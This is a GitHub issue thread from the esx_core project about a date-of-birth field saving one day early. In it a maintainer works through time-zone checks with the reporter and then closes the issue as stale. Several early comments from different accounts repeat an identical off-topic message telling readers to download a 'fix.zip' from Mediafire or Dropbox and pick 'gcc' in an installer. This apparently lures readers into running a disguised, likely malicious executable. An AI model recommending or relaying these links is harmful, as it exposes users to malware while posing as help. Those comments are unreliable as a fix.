### ISSUE TITLE
[Bug] - esx_script - Issue

### ISSUE THREAD

**Issue by Deathdomain** [esx-framework/esx_core#1391] opened 2024-08-25 21:39 UTC
Date of Birth is always -1 day for me I.E put 12/10/1967 i get 12/09/1967

only way i can say to make it happen would be to try to make a character and see yourself with the current core

**Debug Info (please complete the following information):**
 - OS: windows
 -  FiveM Artifact: The latest being 9572
 - ESX Version: 1.1

**Additional context**
its really only off by one day, not a huge deal but it does break the RP if someone doesnt and says the wrong birthday

**Comment by swaggy111** [comment] 2024-08-26 00:02
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by swaggy111** [comment] 2024-08-26 00:26
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment] 2024-08-26 00:33
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment] 2024-08-26 00:44
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment] 2024-08-26 00:58
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment] 2024-08-26 01:23
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment] 2024-08-26 03:29
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Gellipapa** [comment] 2024-08-26 19:37
Hi! DB level it's works perfectly. Can you show me your db record? 

![Image](https://github.com/user-attachments/assets/bc070118-072f-405b-93e2-53ee5da3358d)

**Comment by Deathdomain** [comment] 2024-08-26 20:09
would that just be showing you my DOB or what exactly do u need

**Comment by Deathdomain** [comment] 2024-08-26 20:15
https://go.screenpal.com/watch/cZjOYlVRVjF?_gl=1*1jlujym*_ga*MTk1OTgwODM1LjE3MjQ2MTk2NzI.*_ga_J7G603GGVL*MTcyNDcwMjk4NC4zLjAuMTcyNDcwMzE2MC4wLjAuMA..

is a video of my making a character and showing the -1 DOB

**Comment by Deathdomain** [comment] 2024-08-27 07:02
![image](https://github.com/user-attachments/assets/25ab865a-c534-4a40-895b-cda2ad2fbded)

**Comment by Gellipapa** [comment] 2024-08-27 07:36
Hi! Interesting you should use latest version esx identity and it's works.

**Comment by Deathdomain** [comment] 2024-08-27 08:58
> Hi! Interesting you should use latest version esx identity and it's works.

it doesnt. i have ran through the whole test in the discord before reporting it here, including reinstalling all of the core

**Comment by Deathdomain** [comment] 2024-08-27 08:58
https://discord.com/channels/513374574394474531/1277339650456813618

**Comment by Deathdomain** [comment] 2024-08-27 09:06
just did a reinstall of a fresh esx_indentify and still dont get correct entered date

**Comment by Gellipapa** [comment] 2024-08-27 17:23
@Deathdomain Hi! It is probably because of the time zone that you have this discrepancy.

`SELECT @@global.time_zone, @@session.time_zone;`

Run this mysql command and send me what you get back. If it says "SYSTEM" then the time zone where your system is running is the time zone your MYSQL server is using.

`SET time_zone = '+00:00';`
You can use this SQL command to set your timezone in that session to see if it solves your problem.

**Comment by Deathdomain** [comment] 2024-08-27 23:22
![image](https://github.com/user-attachments/assets/d21b104f-d7c7-4291-a4af-6561b089b599)
![image](https://github.com/user-attachments/assets/33ba29c8-8a99-428a-8d54-23d845508952)
it still didnt work sadly, looks like that set timezone didnt even do anything

**Comment by Gellipapa** [comment] 2024-08-28 19:35
@Deathdomain Hi! It's 100% time zone problem, check your server timezone and try to set any valid UTC time. (My zone for test : GMT+2)

**Comment by Deathdomain** [comment] 2024-08-28 20:47
> UTC time

Look at what i said, its NOT working

**Comment by Deathdomain** [comment] 2024-08-28 20:48
i tried the command you told me to execute and it looks like it didn't even work, let alone change me from SYSTEM when doing SELECT @@global.time_zone, @@session.time_zone; again

**Comment by Deathdomain** [comment] 2024-08-28 20:48
@Gellipapa

**Comment by Deathdomain** [comment] 2024-08-28 20:51
GMT-04:00 which is Eastern Timezone. i have tried that with SET time_zone = '-04:00'; which came back with a empty response

**Comment by Gellipapa** [comment] 2024-08-29 17:18
@Deathdomain Hi! I only described one option, I don't know what your solution will be. You have to manage to be in a time zone where there is no time difference, if you can manage that it will work. 

Watch the video on how to set the time zone on your computer or server machine. 

I'm closing issue because this is not an ESX problem but a specific problem.

**Comment by Deathdomain** [comment] 2024-08-29 20:15
-.- this isnt a me issue

**Comment by Gellipapa** [comment] 2024-08-29 21:07
> -.- this isnt a me issue

[esx_identity-test-utc-manual-parse-date.zip](https://github.com/user-attachments/files/16806034/esx_identity-test-utc-manual-parse-date.zip)

I made you a manual parse date which will probably work for you too. Test it and let me know if it works. You just need to copy the script.js file in your version, although I'd prefer it if you copied the version I sent you one by one and tried that.

**Comment by Gellipapa** [comment] 2024-09-15 13:09
@Deathdomain Hi! Did you try what I sent you? Did it solve your problem?

**Comment by Deathdomain** [comment] 2024-09-17 06:08
> @Deathdomain Hi! Did you try what I sent you? Did it solve your problem?

no it hasnt worked, sorry i lost track of this thread. i cant even create a character after using what you sent me

**Comment by Deathdomain** [comment] 2024-09-17 06:17
well replace the esx_identify with the one u sent and used my script.js

**Comment by Gellipapa** [comment] 2024-09-17 17:50
Hi! @Deathdomain  Interesting then I don't know what your problem might be because now in JS it is independent of what time zone you are in that the date value will be correct. 

Either you haven't restarted the server or you are using some modified esx_identity, or some other identity is overwriting the date or some script is overwriting the date. 

I don't know what your problem is, but it's interesting because no one else has reported it, and there must be other users in your timezone. 

This must be a very specific case. Until we can reproduce it, we can't fix the problem.

**Comment by Mycroft-Studios** [comment] 2024-10-23 22:30
Closed due to being stale, will re-open if there are more reports

**Closed by Mycroft-Studios** 2024-10-23 22:30 UTC
Labels: bug
